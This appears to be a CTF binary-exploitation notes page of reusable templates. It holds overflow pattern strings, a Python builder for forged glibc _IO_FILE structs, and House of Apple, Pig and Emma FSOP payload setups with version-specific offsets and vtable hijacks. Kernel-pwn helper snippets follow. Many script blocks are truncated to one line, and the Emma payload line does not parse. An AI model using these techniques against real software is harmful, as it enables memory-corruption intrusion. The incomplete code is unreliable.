NOTES
我把一些有用的template和payload放在这里可以直接拿来使用。
USER PWN
- overflow helper strings
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzz
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzz
- exp template
1 | #!/usr/bin/env python |
- shellcode
- useful segment
1 | payload = "" |
- utils
class FILE:
    """Builder for a 64-bit glibc ``_IO_FILE`` struct image.

    Each attribute is one struct field in declaration order; all default to
    0 except ``unused2``, which is a raw string zero-padded to 20 bytes when
    packed.  ``str(obj)`` returns the packed image.  With the widths used
    here ``vtable`` lands at byte 216 (0xd8) of the image.

    The packing helpers ``p64``/``p32``/``p16``/``p8`` are not defined on this
    page — presumably pwntools (``from pwn import *``); their byte order
    follows that library's context.  The layout is the 64-bit glibc one;
    verify it against the glibc build actually in use.
    """

    def __init__(self):
        # Word-sized and integer fields, every one zero until the caller sets it.
        for field_name in (
            "flags",
            "IO_read_ptr", "IO_read_end", "IO_read_base",
            "IO_write_base", "IO_write_ptr", "IO_write_end",
            "IO_buf_base", "IO_buf_end",
            "IO_save_base", "IO_backup_base", "IO_save_end",
            "markers", "chain", "fileno", "flags2", "old_offset",
            "cur_column", "vtable_offset", "shortbuf",
            "lock", "offset", "codecvt", "wide_data",
            "freeres_list", "freeres_buf", "pad5", "mode",
            "vtable",
        ):
            setattr(self, field_name, 0)
        # Raw tail bytes (char[20] in the struct); padded on output, not here.
        self.unused2 = ""

    def __str__(self):
        """Pack every field in struct order and return the image as one string."""
        leading_words = (
            self.flags, self.IO_read_ptr, self.IO_read_end, self.IO_read_base,
            self.IO_write_base, self.IO_write_ptr, self.IO_write_end, self.IO_buf_base,
            self.IO_buf_end, self.IO_save_base, self.IO_backup_base, self.IO_save_end,
            self.markers, self.chain,
        )
        image = [p64(word) for word in leading_words]
        image += [p32(self.fileno), p32(self.flags2), p64(self.old_offset)]
        image += [p16(self.cur_column), p8(self.vtable_offset), p8(self.shortbuf)]
        # 4 bytes of alignment padding after the 1-byte shortbuf so `lock`
        # sits on an 8-byte boundary (byte 136).
        image.append(p32(0))
        trailing_words = (
            self.lock, self.offset, self.codecvt, self.wide_data,
            self.freeres_list, self.freeres_buf, self.pad5,
        )
        image += [p64(word) for word in trailing_words]
        image.append(p32(self.mode))
        image.append(self.unused2.ljust(20, "\x00"))
        image.append(p64(self.vtable))
        return "".join(image)
# NOTE(review): `libc`, `heap`, `mangle` and `context_addr` are not defined on
# this page; they must come from the surrounding script (not shown).
# NOTE(review): every numeric constant below is an offset into one particular
# glibc build / heap layout (see the field comments) and does not carry over
# to other versions.
# NOTE(review): `file` shadows the Python 2 builtin of the same name.
# house of apple
file = FILE()
file.IO_write_ptr = 0xdead # a big num
file.vtable = libc.address + 0x1e1c60 # pointer to _IO_wstrn_jumps
file.wide_data = libc.address + 0x1ed600 + 0x30 # pointer to pointer_guard
file.flags2 = 8
file.chain = heap + 0x2a0 # link to next file
# house of pig
file = FILE()
file.IO_write_ptr = 0xdead # a big num
file.vtable = libc.address + 0x1e9560 # offset to _IO_str_jumps
file.IO_buf_base = heap + 0x13198 # pointer to prepared buf
file.IO_buf_end = file.IO_buf_base + 0x1e # 0x1e = (size - 100) / 2
# house of emma
file = FILE()
file.lock = heap # writable
file.vtable = libc.address + 0x215b80 + 0x50 # offset to _IO_cookie_close
payload = str(file)[0x10:] # drops the first 16 bytes (flags, IO_read_ptr)
payload += p64(context_addr) # cookie
# NOTE(review): a backslash continuation must be the last character of its
# line; the trailing comment after `\` below makes this statement a
# SyntaxError as written.
payload += p64(mangle(libc.address + \ # mov rdx, [rdi+8]; mov [rsp], rax; call [rdx+0x20]
0x0000000000165d60 + 576, heap+0x2ae0))*4
KERNEL PWN
# Extract the initramfs into the current directory: -i is copy-in (extract),
# -F names the archive file. --no-absolute-filenames strips leading "/" from
# entry names so the archive cannot write outside the working tree.
cpio -i --no-absolute-filenames -F ../rootfs.cpio
- useful segment
- init
1 | cp /proc/kallsyms kallsyms |
- pack.sh
1 | #!/bin/sh |
- gdb.sh
- upload.py
1 | #!/bin/sh |
- kmagic
1 | #!/usr/bin/env python2 |
- kmem_caches
1 | const struct kmalloc_info_struct kmalloc_info[] __initconst = { |